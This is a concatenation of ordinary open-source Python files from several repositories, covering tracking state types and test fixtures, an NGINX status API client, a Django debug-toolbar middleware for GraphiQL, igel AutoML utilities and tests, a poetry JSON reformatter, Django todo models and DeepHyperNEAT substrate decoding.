def __iter__(self):
return self.sub_states.__iter__()
def __len__(self):
return self.sub_states.__len__()
State.register(CompositeState) # noqa: E305
```
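A short sketch of the `State.from_state` copy-constructor behaviour documented above; the vectors and timestamp are illustrative values only.
```python
# Sketch: from_state copies matching properties and applies keyword overrides.
import datetime
import numpy as np
from stonesoup.types.state import GaussianState, State
t0 = datetime.datetime(2018, 1, 1, 14, 0)
state = GaussianState(np.array([[1.0], [0.5]]), np.eye(2), timestamp=t0)
# Same concrete type; covar and timestamp are copied, state_vector is replaced
moved = State.from_state(state, state_vector=np.array([[2.0], [0.5]]))
assert isinstance(moved, GaussianState)
assert moved.timestamp == t0 and (moved.covar == np.eye(2)).all()
```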
#### File: types/tests/conftest.py
```python
import pytest
from ..detection import Detection, CompositeDetection
from ..hypothesis import SingleHypothesis, CompositeHypothesis, \
CompositeProbabilityHypothesis, SingleProbabilityHypothesis
from ..prediction import StatePrediction, CompositePrediction
@pytest.fixture()
def sub_predictions1():
return [StatePrediction([0]), StatePrediction([1, 2])]
@pytest.fixture()
def sub_predictions2():
return [StatePrediction([3]), StatePrediction([5, 6])]
@pytest.fixture()
def composite_prediction1(sub_predictions1):
return CompositePrediction(sub_predictions1)
@pytest.fixture()
def composite_prediction2(sub_predictions2):
return CompositePrediction(sub_predictions2)
@pytest.fixture()
def sub_measurements1():
return [Detection([7]), Detection([3])]
@pytest.fixture()
def sub_measurements2():
return [Detection([2]), Detection([8])]
@pytest.fixture()
def composite_measurement1(sub_measurements1):
return CompositeDetection(sub_measurements1)
@pytest.fixture()
def composite_measurement2(sub_measurements2):
return CompositeDetection(sub_measurements2)
@pytest.fixture()
def sub_hypotheses1(sub_predictions1, sub_measurements1):
return [
SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement)
for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1)
]
@pytest.fixture()
def sub_hypotheses2(sub_predictions2, sub_measurements2):
return [
SingleHypothesis(prediction=sub_prediction, measurement=sub_measurement)
for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2)
]
@pytest.fixture()
def composite_hypothesis1(composite_prediction1, composite_measurement1, sub_hypotheses1):
return CompositeHypothesis(sub_hypotheses=sub_hypotheses1,
prediction=composite_prediction1,
measurement=composite_measurement1)
@pytest.fixture()
def composite_hypothesis2(composite_prediction2, composite_measurement2, sub_hypotheses2):
return CompositeHypothesis(sub_hypotheses=sub_hypotheses2,
prediction=composite_prediction2,
measurement=composite_measurement2)
@pytest.fixture()
def sub_probability_hypotheses1(sub_predictions1, sub_measurements1):
return [
SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement,
probability=0.5)
for sub_prediction, sub_measurement in zip(sub_predictions1, sub_measurements1)
]
@pytest.fixture()
def sub_probability_hypotheses2(sub_predictions2, sub_measurements2):
return [
SingleProbabilityHypothesis(prediction=sub_prediction, measurement=sub_measurement,
probability=0.2)
for sub_prediction, sub_measurement in zip(sub_predictions2, sub_measurements2)
]
@pytest.fixture()
def composite_probability_hypothesis1(composite_prediction1, composite_measurement1,
sub_probability_hypotheses1):
return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses1,
prediction=composite_prediction1,
measurement=composite_measurement1)
@pytest.fixture()
def composite_probability_hypothesis2(composite_prediction2, composite_measurement2,
sub_probability_hypotheses2):
return CompositeProbabilityHypothesis(sub_hypotheses=sub_probability_hypotheses2,
prediction=composite_prediction2,
measurement=composite_measurement2)
``` |
{
"source": "0snug0/ngxpy",
"score": 3
} |
#### File: ngxpy/ngxpy/ngxpy.py
```python
import requests, json, ConfigParser, os
## TODOs
## 1. Add several common ways to add authentication
## * Basic Auth
## * Custom Headers (X-Auth-Key/X-Auth-User)
# Defaults for .ngxpy.ini if parameters missing
safecfg = { 'schema': 'http',
'host': '127.0.0.1',
'port': '8080',
'status': 'status',
'upstreamConf': 'upstream_conf'
}
cfg = ConfigParser.SafeConfigParser(safecfg)
class ngxpy:
def __init__(self, schema='http',
host='127.0.0.1', port='8080',
status='status', upstreamConf='upstream_conf',
cfgSec=None):
# If .ngxpy.ini exist, use those values, otherwise use function parameters
if cfgSec:
home = os.path.expanduser("~")
file = '{}/.ngxpy.ini'.format(home)
if cfg.read(file):
self.host = self.cfgCheck(cfgSec, 'host')
self.port = self.cfgCheck(cfgSec, 'port')
self.status = self.cfgCheck(cfgSec, 'status')
self.upstreamConf = self.cfgCheck(cfgSec, 'upstreamConf')
self.schema = self.cfgCheck(cfgSec, 'schema')
else:
print '{} file is missing'.format(file)
exit()
else:
self.host = host
self.port = port
self.status = status
self.upstreamConf = upstreamConf
self.schema = schema
self.socket = '{}:{}'.format(self.host, self.port)
self.api = '{}://{}/'.format(self.schema, self.socket)
def cfgCheck(self, sec, param):
try:
return cfg.get(sec, param)
except:
pass
class APIError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
def parse_json(self, request):
try:
return request.json()
except ValueError:
return request.text
def get(self, url, params=None):
r = requests.get(self.api + url, params=params)
return self.parse_json(r)
def get_status(self):
s = self.get(self.status)
return s
def get_stream_status(self):
s = self.get_status()['stream']
return s
def get_upstream_conf(self, **kwargs):
'''
Available Keys:
stream= (Select TCP/UDP server group)
upstream=name (Mandatory)
id=number
remove= (Removes server from group)
add= (Adds server to group)
backup= (Add server as backup in group)
down= (Marks server as down in group)
drain= (Drains server from group)
up= (Marks server as up in group)
server=address
service=name
weight=number
max_conns=number
max_fails=number
fail_timeout=time
slow_start=time
route=string (useful for sticky route Loadbalancer)
'''
u = self.get(self.upstreamConf, params=kwargs)
return u
# isHttp=False are tcp/udp zones and upstreams
def get_server_zones(self, isHttp=True, zone=None):
s = self.get_status()['server_zones']
return s
def get_upstreams(self, isHttp=True, upstream=None):
s = self.get_status()['upstreams']
return s
def get_caches(self):
s = self.get_status()['caches']
return s
def get_peer_stats(self, upstream, peer_id=None, isHttp=True):
peers = []
if isHttp:
s = self.get_status()['upstreams'][upstream]['peers']
else:
s = self.get_stream_status()['upstreams'][upstream]['peers']
for p in s:
if peer_id:
if peer_id == p['id']:
return p
else:
peers.append(p)
return peers
def list_server_zones(self, isHttp=True):
server_zones = []
if isHttp:
s = self.get_status()['server_zones']
else:
s = self.get_stream_status()['server_zones']
for z in s:
server_zones.append(z)
return server_zones
def list_upstreams(self, isHttp=True):
upstreams = []
if isHttp:
s = self.get_status()['upstreams']
else:
s = self.get_stream_status()['upstreams']
for u in s:
upstreams.append(u)
return upstreams
def list_caches(self):
caches = []
s = self.get_status()['caches']
for c in s:
caches.append(c)
return caches
def num_of_peers(self, upstream, isHttp=True):
if isHttp:
s = self.get_status()['upstreams'][upstream]['peers']
else:
s = self.get_stream_status()['upstreams'][upstream]['peers']
return len(s)
``` |
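A hedged usage sketch for the class above; the host, port, and the `backend` upstream name are placeholders, and the import path assumes the package layout in the file header.
```python
# Sketch: querying an NGINX Plus status endpoint with ngxpy (hypothetical host).
from ngxpy.ngxpy import ngxpy
nginx = ngxpy(host='192.168.0.10', port='8080')
print(nginx.list_upstreams())              # HTTP upstream group names
print(nginx.num_of_peers('backend'))       # peer count for the 'backend' group
print(nginx.get_peer_stats('backend', 0))  # stats for the peer with id 0
```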
{
"source": "0soft/django-graphiql-debug-toolbar",
"score": 2
} |
#### File: django-graphiql-debug-toolbar/graphiql_debug_toolbar/middleware.py
```python
import functools
import json
from collections import OrderedDict
from django.template.loader import render_to_string
from django.utils.encoding import force_text
from debug_toolbar import middleware as mmod
from debug_toolbar.middleware import _HTML_TYPES
from debug_toolbar.middleware import DebugToolbarMiddleware as BaseMiddleware
from debug_toolbar.middleware import get_show_toolbar
from debug_toolbar.toolbar import DebugToolbar
from graphene_django.views import GraphQLView
from .serializers import CallableJSONEncoder
__all__ = ['DebugToolbarMiddleware']
class _DebugToolbar(DebugToolbar):
def __init__(self, middleware, *args, **kwargs):
middleware._toolbar = self
super().__init__(*args, **kwargs)
class MockToolbar(object):
def __init__(self, middleware):
self._middleware = middleware
def __enter__(self):
mmod.DebugToolbar = functools.partial(_DebugToolbar, self._middleware)
def __exit__(self, exc_type, exc_val, exc_tb):
mmod.DebugToolbar = DebugToolbar
def set_content_length(response):
if response.has_header('Content-Length'):
response['Content-Length'] = str(len(response.content))
def get_payload(request, response, toolbar):
content = force_text(response.content, encoding=response.charset)
payload = json.loads(content, object_pairs_hook=OrderedDict)
payload['debugToolbar'] = OrderedDict([('panels', OrderedDict())])
for panel in reversed(toolbar.enabled_panels):
if panel.panel_id == 'TemplatesPanel':
continue
panel.generate_stats(request, response)
panel.generate_server_timing(request, response)
if panel.has_content:
title = panel.title
else:
title = None
payload['debugToolbar']['panels'][panel.panel_id] = {
'title': title,
'subtitle': panel.nav_subtitle,
}
toolbar.store()
payload['debugToolbar']['storeId'] = toolbar.store_id
return payload
class DebugToolbarMiddleware(BaseMiddleware):
def process_view(self, request, view_func, *args):
if hasattr(view_func, 'view_class') and\
issubclass(view_func.view_class, GraphQLView):
request._graphql_view = True
def __call__(self, request):
if not get_show_toolbar()(request) or request.is_ajax():
return self.get_response(request)
with MockToolbar(self):
response = super().__call__(request)
content_type = response.get('Content-Type', '').split(';')[0]
html_type = content_type in _HTML_TYPES
graphql_view = getattr(request, '_graphql_view', False)
if response.status_code == 200 and graphql_view and html_type:
template = render_to_string('graphiql_debug_toolbar/base.html')
response.write(template)
set_content_length(response)
if html_type or not (
graphql_view and content_type == 'application/json'):
return response
toolbar = self._toolbar
payload = get_payload(request, response, toolbar)
response.content = json.dumps(payload, cls=CallableJSONEncoder)
set_content_length(response)
return response
``` |
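A configuration sketch for wiring this middleware into a project. The surrounding settings entries are assumptions about a typical Django plus graphene setup, not part of this repository.
```python
# settings.py sketch (hypothetical project). Key point: use this middleware in
# place of debug_toolbar's own DebugToolbarMiddleware, so the panels payload is
# also attached to GraphiQL's application/json responses.
INSTALLED_APPS = [
    # ...
    'debug_toolbar',
    'graphene_django',
    'graphiql_debug_toolbar',
]
MIDDLEWARE = [
    # ...
    'graphiql_debug_toolbar.middleware.DebugToolbarMiddleware',
]
```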
{
"source": "0sparsh2/igel",
"score": 2
} |
#### File: igel/auto/cnn.py
```python
import json
import logging
import os
import autokeras as ak
from igel.auto.defaults import Defaults
from igel.auto.models import Models
from igel.constants import Constants
from igel.utils import read_json, read_yaml
from tensorflow.keras.models import load_model
logger = logging.getLogger(__name__)
class IgelCNN:
defaults = Defaults()
model = None
dataset_props = {}
model_props = {}
model_args = {}
training_args = {}
results_path = Constants.results_dir
def __init__(self, **cli_args):
self.cmd: str = cli_args.get("cmd")
self.data_path: str = cli_args.get("data_path")
self.config_path: str = cli_args.get("yaml_path")
self.task = cli_args.get("task")
logger.info(f"Executing command: {self.cmd}")
logger.info(f"Reading data from: {self.data_path}")
logger.info(f"Reading yaml configs from: {self.config_path}")
if self.cmd == "train":
if not self.config_path:
self.model_type = self.task
else:
                self.file_ext: str = self.config_path.rsplit(".", 1)[-1]
if self.file_ext not in ["yaml", "yml", "json"]:
raise Exception(
"Configuration file can be a yaml or a json file!"
)
self.configs: dict = (
read_json(self.config_path)
if self.file_ext == "json"
else read_yaml(self.config_path)
)
self.dataset_props: dict = self.configs.get(
"dataset", self.defaults.dataset_props
)
self.model_props: dict = self.configs.get(
"model", self.defaults.model_props
)
self.training_args: dict = self.configs.get(
"training", self.defaults.training_args
)
self.model_args = self.model_props.get("arguments")
self.model_type = self.task or self.model_props.get("type")
else:
self.model_path = cli_args.get(
"model_path", self.defaults.model_path
)
logger.info(f"path of the pre-fitted model => {self.model_path}")
self.prediction_file = cli_args.get(
"prediction_file", self.defaults.prediction_file
)
# set description.json if provided:
self.description_file = cli_args.get(
"description_file", self.defaults.description_file
)
# load description file to read stored training parameters
with open(self.description_file) as f:
dic = json.load(f)
self.model_type: str = dic.get("task") # type of the model
self.dataset_props: dict = dic.get(
"dataset_props"
) # dataset props entered while fitting
getattr(self, self.cmd)()
def _create_model(self, *args, **kwargs):
model_cls = Models.get(self.model_type)
model = (
model_cls() if not self.model_args else model_cls(**self.model_args)
)
return model
def save_desc_file(self):
desc = {
"task": self.model_type,
"model": self.model.__class__.__name__,
"dataset_props": self.dataset_props or None,
"model_props": self.model_props or None,
}
try:
logger.info(f"saving fit description to {self.description_file}")
with open(self.description_file, "w", encoding="utf-8") as f:
json.dump(desc, f, ensure_ascii=False, indent=4)
except Exception as e:
logger.exception(
f"Error while storing the fit description file: {e}"
)
def save_model(self):
exp_model = self.model.export_model()
logger.info(f"model type: {type(exp_model)}")
        try:
            exp_model.save("model", save_format="tf")
            return True
        except Exception:
            # Fall back to the HDF5 format if the SavedModel export fails
            exp_model.save("model.h5")
            return True
def train(self):
train_data = ak.image_dataset_from_directory(self.data_path)
self.model = self._create_model()
logger.info(f"executing a {self.model.__class__.__name__} algorithm...")
logger.info(f"Training started...")
self.model.fit(train_data, **self.training_args)
logger.info("finished training!")
self.save_desc_file()
saved = self.save_model()
if saved:
logger.info(f"model saved successfully")
def load_model(self):
logger.info("loading model...")
loaded_model = load_model("model", custom_objects=ak.CUSTOM_OBJECTS)
logger.info("model loaded successfully")
return loaded_model
def evaluate(self):
trained_model = self.load_model()
test_data = ak.image_dataset_from_directory(self.data_path)
trained_model.evaluate(test_data)
def predict(self):
trained_model = self.load_model()
pred_data = ak.image_dataset_from_directory(self.data_path)
trained_model.predict(pred_data)
```
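A hedged sketch of driving `IgelCNN` from code. The paths are placeholders, and the `task` value must be a key accepted by `Models.get`, which is not shown in this excerpt.
```python
# Sketch: the constructor dispatches on `cmd` via getattr, so instantiating
# with cmd="train" starts training immediately. Paths and task are hypothetical.
from igel.auto.cnn import IgelCNN
IgelCNN(cmd="train",
        data_path="./images/train",  # directory consumed by autokeras
        yaml_path="./igel.yaml",     # optional; `task` is used when omitted
        task="ImageClassification")  # must be a key known to Models.get
```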
#### File: igel/servers/helper.py
```python
import logging
import os
logger = logging.getLogger(__name__)
def remove_temp_data_file(f):
"""
    Remove the temporary file in which the request payload was stored for igel to generate predictions.
"""
# remove temp file:
if os.path.exists(f):
logger.info(f"removing temporary file: {f}")
os.remove(f)
```
#### File: igel/igel/utils.py
```python
import json
import logging
import joblib
import pandas as pd
import yaml
from igel.configs import configs
from igel.data import metrics_dict, models_dict
logger = logging.getLogger(__name__)
def create_yaml(data, f):
try:
with open(f, "w") as yf:
yaml.dump(data, yf, default_flow_style=False)
except yaml.YAMLError as exc:
logger.exception(exc)
return False
else:
return True
def read_yaml(f):
with open(f) as stream:
try:
res = yaml.safe_load(stream)
except yaml.YAMLError as exc:
logger.exception(exc)
else:
return res
def read_json(f):
try:
with open(f) as file:
data = json.load(file)
except Exception as e:
logger.exception(e.args)
else:
return data
def extract_params(config):
assert (
"model" in config.keys()
), "model parameters need to be provided in the yaml file"
assert (
"target" in config.keys()
), "target variable needs to be provided in the yaml file"
model_params = config.get("model")
model_type = model_params.get("type")
algorithm = model_params.get("algorithm")
target = config.get("target")
if any(not item for item in [model_type, target, algorithm]):
raise Exception("parameters in the model yaml file cannot be None")
else:
return model_type, target, algorithm
def _reshape(arr):
if len(arr.shape) <= 1:
arr = arr.reshape(-1, 1)
return arr
def load_trained_model(f: str = ""):
"""
load a saved model from file
@param f: path to model
@return: loaded model
"""
try:
if not f:
logger.info(f"result path: {configs.get('results_path')} ")
logger.info(
f"loading model form {configs.get('default_model_path')} "
)
with open(configs.get("default_model_path"), "rb") as _model:
model = joblib.load(_model)
else:
logger.info(f"loading from {f}")
with open(f, "rb") as _model:
model = joblib.load(_model)
return model
except FileNotFoundError:
logger.error(f"File not found in {configs.get('default_model_path')}")
def load_train_configs(f=""):
"""
load train configurations from model_results/descriptions.json
"""
try:
if not f:
logger.info(
f"loading descriptions.json form {configs.get('description_file')} "
)
with open(configs.get("description_file"), "rb") as desc_file:
training_config = json.load(desc_file)
else:
with open(f, "rb") as desc_file:
training_config = json.load(desc_file)
return training_config
except FileNotFoundError as e:
logger.error(f"File not found: {e}")
except Exception as e:
logger.error(e)
def get_expected_scaling_method(training_config):
"""
get expected scaling method from the parsed training configuration (description.json)
"""
dataset_props = training_config.get("dataset_props")
if not dataset_props:
return
preprocess_options = dataset_props.get("preprocess")
if not preprocess_options:
return
scaling_options = preprocess_options.get("scale")
if not scaling_options:
return
return scaling_options.get("method")
def show_model_info(model_name: str, model_type: str):
if not model_name:
print(f"Please enter a supported model")
print_models_overview()
else:
if not model_type:
print(
f"Please enter a type argument to get help on the chosen model\n"
f"type can be whether regression, classification or clustering \n"
)
print_models_overview()
return
if model_type not in ("regression", "classification", "clustering"):
raise Exception(
f"{model_type} is not supported! \n"
f"model_type need to be regression, classification or clustering"
)
models = models_dict.get(model_type)
model_data = models.get(model_name)
model, link, *cv_class = model_data.values()
print(
f"model type: {model_type} \n"
f"model name: {model_name} \n"
f"sklearn model class: {model.__name__} \n"
f"{'-' * 60}\n"
f"You can click the link below to know more about the optional arguments\n"
f"that you can use with your chosen model ({model_name}).\n"
f"You can provide these optional arguments in the yaml file if you want to use them.\n"
f"link:\n{link} \n"
)
def tableize(df):
"""
pretty-print a dataframe as table
"""
if not isinstance(df, pd.DataFrame):
return
df_columns = df.columns.tolist()
max_len_in_lst = lambda lst: len(sorted(lst, reverse=True, key=len)[0])
align_center = (
lambda st, sz: "{0}{1}{0}".format(" " * (1 + (sz - len(st)) // 2), st)[
:sz
]
if len(st) < sz
else st
)
align_right = (
lambda st, sz: "{}{} ".format(" " * (sz - len(st) - 1), st)
if len(st) < sz
else st
)
max_col_len = max_len_in_lst(df_columns)
max_val_len_for_col = {
col: max_len_in_lst(df.iloc[:, idx].astype("str"))
for idx, col in enumerate(df_columns)
}
col_sizes = {
col: 2 + max(max_val_len_for_col.get(col, 0), max_col_len)
for col in df_columns
}
build_hline = lambda row: "+".join(
["-" * col_sizes[col] for col in row]
).join(["+", "+"])
build_data = lambda row, align: "|".join(
[
align(str(val), col_sizes[df_columns[idx]])
for idx, val in enumerate(row)
]
).join(["|", "|"])
hline = build_hline(df_columns)
out = [hline, build_data(df_columns, align_center), hline]
for _, row in df.iterrows():
out.append(build_data(row.tolist(), align_right))
out.append(hline)
return "\n".join(out)
def print_models_overview():
print(f"\nIgel's supported models overview: \n")
reg_algs = list(models_dict.get("regression").keys())
clf_algs = list(models_dict.get("classification").keys())
cluster_algs = list(models_dict.get("clustering").keys())
df_algs = (
pd.DataFrame.from_dict(
{
"regression": reg_algs,
"classification": clf_algs,
"clustering": cluster_algs,
},
orient="index",
)
.transpose()
.fillna("----")
)
df = tableize(df_algs)
print(df)
```
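A small sketch of `tableize`; the frame contents are illustrative.
```python
# Sketch: tableize renders a DataFrame as a bordered ASCII table with centred
# headers and right-aligned values.
import pandas as pd
from igel.utils import tableize
df = pd.DataFrame({"algorithm": ["LinearRegression", "Lasso"],
                   "type": ["regression", "regression"]})
print(tableize(df))
```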
#### File: tests/test_igel/test_igel.py
```python
import os
import pytest
from igel import Igel
from .constants import Constants
from .helper import remove_folder
from .mock import MockCliArgs
os.chdir(os.path.dirname(__file__))
@pytest.fixture
def mock_args():
yield MockCliArgs
remove_folder(Constants.model_results_dir)
assert Constants.model_results_dir.exists() == False
def test_fit(mock_args):
"""
test the fit model functionality
"""
assert mock_args is not None
Igel(**mock_args.fit)
assert Constants.model_results_dir.exists() == True
assert Constants.description_file.exists() == True
assert Constants.evaluation_file.exists() == False
def test_export(mock_args):
"""
test the export model functionality
"""
assert mock_args is not None
Igel(**mock_args.fit)
Igel(**mock_args.export)
assert Constants.onnx_model_file.exists() == True
``` |
{
"source": "0ssifrage/tang300",
"score": 3
} |
#### File: 0ssifrage/tang300/trim2.py
```python
import json
def main():
f = open('tang300.v3.json', 'r')
ps = json.load(f)
np = []
for p in ps:
if p[3][0][-1] == u',':
t = []
for i in xrange(len(p[3])/2):
t.append(p[3][2*i]+p[3][2*i+1])
p[3] = t
np.append(p)
f2 = open('tang300.v4.json', 'w')
s = json.dumps(np, ensure_ascii=False, indent=2)
f2.write(s.encode('utf-8'))
f.close()
f2.close()
main()
``` |
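The loop in `main()` merges comma-terminated half-lines into couplets; a toy illustration of that pairing step:
```python
# Toy illustration: consecutive half-lines are joined two at a time when the
# first half-line of a poem ends with a comma.
lines = [u'A,', u'B.', u'C,', u'D.']
couplets = [lines[2 * i] + lines[2 * i + 1] for i in range(len(lines) // 2)]
assert couplets == [u'A,B.', u'C,D.']
```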
{
"source": "0sw4l/Cuke",
"score": 2
} |
#### File: Cuke/TodoList/models.py
```python
from django.db import models
from django.contrib.auth.models import User
class Cliente(User):
titulo = (
('Sr', 'Sr'),
('Srita', 'Srita'),
('Sra', 'Sra'),
('Don', 'Don'),
('Ingeniero', 'Ingeniero'),
('Doctor', 'Doctor'))
tratamiento = models.CharField(max_length=15,choices=titulo,default=None)
def __str__(self):
return '{0} - {1}'.format(self.username, self.tratamiento)
class Categoria(models.Model):
nombre = models.CharField(max_length=10)
def __str__(self):
return self.nombre
class Nota(models.Model):
usuario = models.ForeignKey(Cliente)
nota = models.CharField(max_length=50)
categoria = models.ForeignKey(Categoria)
lista = (
('Urgente', 'Urgente'),
('Normal', 'Normal'),
        ('Relajao', 'Relajao'),
('Pendiente', 'Pendiente'),
)
prioridad = models.CharField(max_length=10,choices=lista,default=None)
completada = models.BooleanField(default=False)
def __str__(self):
return self.nota
``` |
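A brief ORM sketch using the models above; it assumes migrations have been applied and runs inside a configured Django project, with hypothetical data.
```python
# Sketch: create a client, a category, and a prioritised note.
cliente = Cliente.objects.create(username='juan', tratamiento='Sr')
categoria = Categoria.objects.create(nombre='Trabajo')
nota = Nota.objects.create(usuario=cliente, nota='Enviar informe',
                           categoria=categoria, prioridad='Urgente')
print(nota)     # -> Enviar informe
print(cliente)  # -> juan - Sr
```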
{
"source": "0T34/DeepHyperNEAT",
"score": 3
} |
#### File: DeepHyperNEAT/deep_hyperneat/decode.py
```python
import numpy as np
import itertools as it
from deep_hyperneat.activations import ActivationFunctionSet
from deep_hyperneat.phenomes import FeedForwardSubstrate
import time
def decode(cppn, input_dimensions, output_dimensions, sheet_dimensions=None):
'''
Decodes a CPPN into a substrate.
cppn -- CPPN
input_dimensions -- dimensions of substrate input layer
output_dimension -- dimensions of substrate output layer
sheet_dimensions -- optional substrate sheet dimensions
'''
# Create input layer coordinate map from specified input dimensions
x = np.linspace(-1.0, 1.0, input_dimensions[1]) if (input_dimensions[1] > 1) else [0.0]
y = np.linspace(-1.0, 1.0, input_dimensions[0]) if (input_dimensions[0] > 1) else [0.0]
input_layer = list(it.product(x,y))
# Create output layer coordinate map from specified output dimensions
x = np.linspace(-1.0,1.0,output_dimensions) if (output_dimensions > 1) else [0.0]
y = [0.0]
output_layer = list(it.product(x,y))
# Create sheet coordinate map from given sheet dimensions (if any)
if sheet_dimensions:
x = np.linspace(-1.0, 1.0, sheet_dimensions[1]) if (sheet_dimensions[1] > 1) else [0.0]
y = np.linspace(-1.0, 1.0, sheet_dimensions[0]) if (sheet_dimensions[0] > 1) else [0.0]
sheet = list(it.product(x,y))
else:
sheet = input_layer
# Create list of mappings to be created between substrate sheets
connection_mappings = [cppn.nodes[x].cppn_tuple for x in cppn.output_nodes if cppn.nodes[x].cppn_tuple[0] != (1,1)]
# Create substrate representation (dictionary of sheets and their respective coordinate maps)
hidden_sheets = {cppn.nodes[node].cppn_tuple[0] for node in cppn.output_nodes}
substrate = {s:sheet for s in hidden_sheets}
substrate[(1,0)] = input_layer
substrate[(0,0)] = output_layer
substrate[(1,1)] = [(0.0,0.0)]
# Create dictionary of output node IDs to their respective mapping tuples
cppn_idx_dict = {cppn.nodes[idx].cppn_tuple:idx for idx in cppn.output_nodes}
# Create the substrate
return create_substrate(cppn, substrate, connection_mappings, cppn_idx_dict)
def create_substrate(cppn, substrate, mapping_tuples, id_dict, act_func="relu"):
'''
Creates a neural network from a CPPN and substrate representation.
Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>.
cppn -- CPPN
substrate -- substrate representation (a dictionary of sheets and their respective coordinate maps)
mapping_tuples -- list of mappings to be created between substrate sheets
id_dict -- dictionary of output node IDs and their respective mapping tuples
act_func -- optional argument for the activation function of the substrate
'''
node_evals, layers = [], gather_layers(substrate)
# Assign coordinates to input, output, and bias layers
input_coordinates, output_coordinates, bias_coordinates = (substrate[(1,0)],(1,0)), (substrate[(0,0)],(0,0)), (substrate[(1,1)],(1,1))
# Assign ids to nodes in the substrate
input_node_ids = list(range(len(input_coordinates[0])))
bias_node_ids = list(range(len(input_node_ids), len(input_node_ids+bias_coordinates[0])))
output_node_ids = list(range(len(input_node_ids+bias_node_ids), len(input_node_ids+bias_node_ids+output_coordinates[0])))
# Remove the input and output layers from the substrate dictionary
del substrate[(1,0)], substrate[(0,0)], substrate[(1,1)]
# Create hidden layer coordinate maps
hidden_coordinates = [(substrate[k], k) for k in substrate.keys()]
# Assign ids to nodes in all hidden layers
number_of_hidden_nodes = sum([len(layer[0]) for layer in hidden_coordinates])
start_index = len(input_node_ids+output_node_ids+bias_node_ids)
hidden_node_ids = list(range(start_index, start_index+number_of_hidden_nodes))
# Get activation function for substrate
act_func_set = ActivationFunctionSet()
hidden_activation = act_func_set.get(act_func)
output_activation = act_func_set.get('linear')
# Decode depending on whether there are hidden layers or not
if hidden_node_ids:
# Query CPPN for mapping between output layer and topmost hidden layer
out_hid_mapping_tuples = [mapping for mapping in mapping_tuples if mapping[1] == (0,0)]
out_node_counter, idx, hidden_idx = 0, 0, 0
# For each coordinate in output sheet
for oc in output_coordinates[0]:
# Adding Biases from Output to Hidden
node_connections = query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[0], id_dict)
# For each connection mapping
for mapping in out_hid_mapping_tuples:
source_sheet_id = mapping[0]
node_connections += query_cppn(cppn,oc,output_coordinates,(substrate[source_sheet_id],source_sheet_id), hidden_node_ids[idx], id_dict)
idx += len(substrate[source_sheet_id])
if node_connections:
node_evals.append((output_node_ids[out_node_counter], output_activation, sum, node_connections))
hidden_idx = idx
idx = 0
out_node_counter += 1
# Query CPPN for mapping between hidden layers (from top to bottom)
hid_node_counter = 0
next_idx = idx = hidden_idx
# For each hidden layer in the substrate, going from top to bottom
for layer_idx in range((len(layers)-1), 2, -1):
            # For each sheet in the current layer
for sheet_idx in range(len(layers[layer_idx])):
# Assign target sheet id
target_sheet_id = layers[layer_idx][sheet_idx]
hid_hid_mapping_tuple = [mapping for mapping in mapping_tuples if (mapping[1] == target_sheet_id)]
# For each coordinate in target sheet
for hc in substrate[target_sheet_id]:
# Adding Biases from Hidden to Hidden
node_connections = query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict)
for mapping in hid_hid_mapping_tuple:
source_sheet_id = mapping[0]
node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),(substrate[source_sheet_id], source_sheet_id),hidden_node_ids[idx], id_dict)
idx += len(substrate[source_sheet_id])
if node_connections:
node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation,sum, node_connections))
hid_node_counter += 1
next_idx = idx
idx = hidden_idx
idx = next_idx
hidden_idx = next_idx
# Query CPPN for mapping between bottom hidden layer to input layer
idx = 0
for i in range(len(layers[2])):
# Assign target
target_sheet_id = layers[2][i]
# For each coordinate in target sheet
for hc in substrate[target_sheet_id]:
node_connections = query_cppn(cppn, hc, (substrate[target_sheet_id],target_sheet_id), input_coordinates, input_node_ids[idx], id_dict)
# Adding Biases from Hidden to Input
node_connections += query_cppn(cppn,hc,(substrate[target_sheet_id],target_sheet_id),bias_coordinates,bias_node_ids[0], id_dict)
if node_connections:
node_evals.append((hidden_node_ids[hid_node_counter],hidden_activation, sum,node_connections))
hid_node_counter += 1
# No hidden layers
else:
# Output Input Layer
idx, counter = 0, 0
for i in range(len(layers[0])):
# Assign target
target_sheet_id = layers[0][i]
# For each coordinate in target sheet
for oc in output_coordinates[0]:
node_connections = query_cppn(cppn,oc,output_coordinates,input_coordinates,input_node_ids[idx], id_dict)
node_connections += query_cppn(cppn,oc,output_coordinates,bias_coordinates,bias_node_ids[idx], id_dict)
if node_connections:
node_evals.append((output_node_ids[counter],output_activation,sum,node_connections))
counter += 1
return FeedForwardSubstrate(input_node_ids, bias_node_ids, output_node_ids, node_evals)
def query_cppn(cppn, source_coordinate, source_layer, target_layer, node_idx, id_dict, max_weight=5.0):
'''
Given a single node's coordinates and a layer of nodes, query the CPPN for potential weights
for all possible connections between the layer and the single node.
Based on PurePLES. Copyright (c) 2017 <NAME> & <NAME>.
cppn -- CPPN
source_coordinate -- coordinate of single node to be connected to a set of nodes
source_layer -- layer of nodes in which source_coordinate resides
target_layer -- layer of nodes to which source_coordinate will be connected
node_idx -- node index to begin on when traversing target_layer
id_dict -- dictionary of CPPN output node ids and their respective mapping tuples
'''
node_connections = []
target_coordinates = target_layer[0]
target_layer_id = target_layer[1]
source_layer_id = source_layer[1]
mapping_tuple = (target_layer_id,source_layer_id)
cppnon_id = id_dict[mapping_tuple]
for target_coordinate in target_coordinates:
i = [target_coordinate[0], target_coordinate[1], source_coordinate[0], source_coordinate[1]]
w = cppn.activate(i)[cppnon_id]
        # scale the CPPN output by max_weight, clamping the magnitude so the
        # final connection weight stays within [-max_weight, max_weight]
        # (the clamp preserves the sign of w)
        if abs(w) < max_weight:
            node_connections.append((node_idx, w * max_weight))
        else:
            node_connections.append((node_idx, max_weight if w > 0 else -max_weight))
node_idx += 1
return node_connections
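# Hypothetical usage sketch (not part of the original code): `cppn` would be a
# CPPN network object whose activate() returns one output per mapping, and each
# layer is a (coordinates, sheet_id) pair:
# source_layer = ([(0.0, 1.0)], (0, 0))
# target_layer = ([(-0.5, 0.5), (0.5, 0.5)], (2, 0))
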